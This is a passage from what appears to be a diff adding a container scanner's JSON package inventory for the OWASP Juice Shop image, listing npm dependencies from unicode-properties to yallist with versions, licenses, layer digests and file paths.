"sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/unicode-properties/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "unicode-trie@2.0.0", + "Name": "unicode-trie", + "Identifier": { + "PURL": "pkg:npm/unicode-trie@2.0.0", + "UID": "f09d67e042af6264" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/unicode-trie/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "unique-filename@1.1.1", + "Name": "unique-filename", + "Identifier": { + "PURL": "pkg:npm/unique-filename@1.1.1", + "UID": "447b3a26b467a2ad" + }, + "Version": "1.1.1", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/unique-filename/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "unique-filename@4.0.0", + "Name": "unique-filename", + "Identifier": { + "PURL": "pkg:npm/unique-filename@4.0.0", + "UID": "236a7469a1599df1" + }, + "Version": "4.0.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/unique-filename/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "unique-slug@2.0.2", + "Name": "unique-slug", + "Identifier": { + "PURL": "pkg:npm/unique-slug@2.0.2", + "UID": "ffdc168b728f2847" + }, + "Version": "2.0.2", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/unique-slug/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "unique-slug@5.0.0", + "Name": "unique-slug", + "Identifier": { + "PURL": "pkg:npm/unique-slug@5.0.0", + "UID": "bba73cf030b91297" + }, + "Version": "5.0.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/unique-slug/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "universalify@2.0.1", + "Name": "universalify", + "Identifier": { + "PURL": "pkg:npm/universalify@2.0.1", + "UID": "95a391effe65e940" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/universalify/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "unpipe@1.0.0", + "Name": "unpipe", + "Identifier": { + "PURL": "pkg:npm/unpipe@1.0.0", + "UID": "46b8c215e46cc0f" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/unpipe/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "unzipper@0.9.15", + "Name": "unzipper", + "Identifier": { + "PURL": "pkg:npm/unzipper@0.9.15", + "UID": "42789e98fe93f8d" + }, + "Version": "0.9.15", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/unzipper/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "url-parse-lax@3.0.0", + "Name": "url-parse-lax", + "Identifier": { + "PURL": "pkg:npm/url-parse-lax@3.0.0", + "UID": "a9f705aed768bfc" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/url-parse-lax/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "url-to-options@1.0.1", + "Name": "url-to-options", + "Identifier": { + "PURL": "pkg:npm/url-to-options@1.0.1", + "UID": "e9bab56719cc3cbf" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/url-to-options/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "utf8-byte-length@1.0.5", + "Name": "utf8-byte-length", + "Identifier": { + "PURL": "pkg:npm/utf8-byte-length@1.0.5", + "UID": "51f2da6ef47bb425" + }, + "Version": "1.0.5", + "Licenses": [ + "(WTFPL OR MIT)" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/utf8-byte-length/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "util-deprecate@1.0.2", + "Name": "util-deprecate", + "Identifier": { + "PURL": "pkg:npm/util-deprecate@1.0.2", + "UID": "4f17b98c1b19e18e" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/util-deprecate/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "utils-merge@1.0.1", + "Name": "utils-merge", + "Identifier": { + "PURL": "pkg:npm/utils-merge@1.0.1", + "UID": "f9d14879d53574f9" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/utils-merge/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "uuid@8.3.2", + "Name": "uuid", + "Identifier": { + "PURL": "pkg:npm/uuid@8.3.2", + "UID": "1f1e50f54c76f55d" + }, + "Version": "8.3.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/uuid/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "v8flags@4.0.1", + "Name": "v8flags", + "Identifier": { + "PURL": "pkg:npm/v8flags@4.0.1", + "UID": "784ef203928970c" + }, + "Version": "4.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/v8flags/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "validate@4.5.1", + "Name": "validate", + "Identifier": { + "PURL": "pkg:npm/validate@4.5.1", + "UID": "158c9224f786f437" + }, + "Version": "4.5.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/validate/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "validator@13.15.35", + "Name": "validator", + "Identifier": { + "PURL": "pkg:npm/validator@13.15.35", + "UID": "ab1b31f594304075" + }, + "Version": "13.15.35", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/validator/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "vary@1.1.2", + "Name": "vary", + "Identifier": { + "PURL": "pkg:npm/vary@1.1.2", + "UID": "b0be96370b4a84bc" + }, + "Version": "1.1.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/vary/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "void-elements@3.1.0", + "Name": "void-elements", + "Identifier": { + "PURL": "pkg:npm/void-elements@3.1.0", + "UID": "6d7f911fdf75598b" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/void-elements/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "walk@2.3.15", + "Name": "walk", + "Identifier": { + "PURL": "pkg:npm/walk@2.3.15", + "UID": "ccf4a37451f2507d" + }, + "Version": "2.3.15", + "Licenses": [ + "(MIT OR Apache-2.0)" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/walk/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "walkdir@0.0.11", + "Name": "walkdir", + "Identifier": { + "PURL": "pkg:npm/walkdir@0.0.11", + "UID": "10e8194dffc3c122" + }, + "Version": "0.0.11", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/walkdir/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "which@1.3.1", + "Name": "which", + "Identifier": { + "PURL": "pkg:npm/which@1.3.1", + "UID": "79eb00da0203f6d2" + }, + "Version": "1.3.1", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/global-prefix/node_modules/which/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "which@2.0.2", + "Name": "which", + "Identifier": { + "PURL": "pkg:npm/which@2.0.2", + "UID": "34a42f3a149cd0f1" + }, + "Version": "2.0.2", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/which/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "which@5.0.0", + "Name": "which", + "Identifier": { + "PURL": "pkg:npm/which@5.0.0", + "UID": "9924b7720c3b9f2f" + }, + "Version": "5.0.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/node-gyp/node_modules/which/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "which-boxed-primitive@1.1.1", + "Name": "which-boxed-primitive", + "Identifier": { + "PURL": "pkg:npm/which-boxed-primitive@1.1.1", + "UID": "740dccb203b805ae" + }, + "Version": "1.1.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/which-boxed-primitive/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "which-collection@1.0.2", + "Name": "which-collection", + "Identifier": { + "PURL": "pkg:npm/which-collection@1.0.2", + "UID": "7dca038be30a3d2d" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/which-collection/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "which-module@2.0.1", + "Name": "which-module", + "Identifier": { + "PURL": "pkg:npm/which-module@2.0.1", + "UID": "c9b4e6f8ed804e7c" + }, + "Version": "2.0.1", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/which-module/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "which-pm-runs@1.1.0", + "Name": "which-pm-runs", + "Identifier": { + "PURL": "pkg:npm/which-pm-runs@1.1.0", + "UID": "7da7a9390c3bb734" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/which-pm-runs/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "which-typed-array@1.1.20", + "Name": "which-typed-array", + "Identifier": { + "PURL": "pkg:npm/which-typed-array@1.1.20", + "UID": "3f96a20e8d585ae3" + }, + "Version": "1.1.20", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/which-typed-array/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "wide-align@1.1.3", + "Name": "wide-align", + "Identifier": { + "PURL": "pkg:npm/wide-align@1.1.3", + "UID": "eb9a806dc2806ff9" + }, + "Version": "1.1.3", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/wide-align/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "wide-align@1.1.5", + "Name": "wide-align", + "Identifier": { + "PURL": "pkg:npm/wide-align@1.1.5", + "UID": "3ab534b758896704" + }, + "Version": "1.1.5", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/wide-align/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "winston@3.19.0", + "Name": "winston", + "Identifier": { + "PURL": "pkg:npm/winston@3.19.0", + "UID": "e0b409df62a029e3" + }, + "Version": "3.19.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/winston/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "winston-transport@4.9.0", + "Name": "winston-transport", + "Identifier": { + "PURL": "pkg:npm/winston-transport@4.9.0", + "UID": "ec8aa3e27e91d47f" + }, + "Version": "4.9.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/winston-transport/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "with@7.0.2", + "Name": "with", + "Identifier": { + "PURL": "pkg:npm/with@7.0.2", + "UID": "f2f03b3fbc70dc41" + }, + "Version": "7.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/with/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "wkx@0.5.0", + "Name": "wkx", + "Identifier": { + "PURL": "pkg:npm/wkx@0.5.0", + "UID": "324d67050820b120" + }, + "Version": "0.5.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/wkx/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "wordwrap@1.0.0", + "Name": "wordwrap", + "Identifier": { + "PURL": "pkg:npm/wordwrap@1.0.0", + "UID": "434ea3873b6a1140" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/wordwrap/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "wrap-ansi@6.2.0", + "Name": "wrap-ansi", + "Identifier": { + "PURL": "pkg:npm/wrap-ansi@6.2.0", + "UID": "5e982b463e7ecfa" + }, + "Version": "6.2.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/replace/node_modules/wrap-ansi/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "wrap-ansi@7.0.0", + "Name": "wrap-ansi", + "Identifier": { + "PURL": "pkg:npm/wrap-ansi@7.0.0", + "UID": "dcd1374e14c1a6e8" + }, + "Version": "7.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/wrap-ansi-cjs/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "wrap-ansi@8.1.0", + "Name": "wrap-ansi", + "Identifier": { + "PURL": "pkg:npm/wrap-ansi@8.1.0", + "UID": "f07e01c9567a1eab" + }, + "Version": "8.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/wrap-ansi/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "wrappy@1.0.2", + "Name": "wrappy", + "Identifier": { + "PURL": "pkg:npm/wrappy@1.0.2", + "UID": "667b71fcb90d3a0f" + }, + "Version": "1.0.2", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/wrappy/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ws@7.4.6", + "Name": "ws", + "Identifier": { + "PURL": "pkg:npm/ws@7.4.6", + "UID": "e83b87b6f7940c56" + }, + "Version": "7.4.6", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/engine.io/node_modules/ws/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ws@8.17.1", + "Name": "ws", + "Identifier": { + "PURL": "pkg:npm/ws@8.17.1", + "UID": "7465b75db3996441" + }, + "Version": "8.17.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/ws/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "xtend@4.0.2", + "Name": "xtend", + "Identifier": { + "PURL": "pkg:npm/xtend@4.0.2", + "UID": "abde69cc55f7cef3" + }, + "Version": "4.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/xtend/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "y18n@4.0.3", + "Name": "y18n", + "Identifier": { + "PURL": "pkg:npm/y18n@4.0.3", + "UID": "e44228f3f4721d58" + }, + "Version": "4.0.3", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/y18n/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "yallist@3.1.1", + "Name": "yallist", + "Identifier": { + "PURL": "pkg:npm/yallist@3.1.1", + "UID": "ec80ee79139c903" + }, + "Version": "3.1.1", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/node-pre-gyp/node_modules/yallist/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "yallist@4.0.0", + "Name": "yallist", + "Identifier": { + "PURL": "pkg:npm/yallist@4.0.0", + "UID": "cdb818f91261d2cc" + }, + "Version": "4.0.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/minipass-flush/node_modules/yallist/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "yallist@4.0.0", + "Name": "yallist", + "Identifier": { + "PURL": "pkg:npm/yallist@4.0.0", + "UID": "1bb8da80ef7e0042" + }, + "Version": "4.0.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/minipass-pipeline/node_modules/yallist/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "yallist@4.0.0", + "Name": "yallist", + "Identifier": { + "PURL": "pkg:npm/yallist@4.0.0", + "UID": "de8afd5d1a0d571f" + }, + "Version": "4.0.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/minipass-sized/node_modules/yallist/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "yallist@4.0.0", + "Name": "yallist", + "Identifier": { + "PURL": "pkg:npm/yallist@4.0.0", + "UID": "dea1df784c3470ee" + }, + "Version": "4.0.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/yallist/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "yallist@5.0.0", + "Name": "yallist", + "Identifier": { + "PURL": "pkg:npm/yallist@5.0.0", + "UID": "41fc469c8191b4fd" + }, + "Version": "5.0.0", + "Licenses": [ + "BlueOak-1.0.0" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/yallist/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "yaml-schema-validator@1.2.3", + "Name": 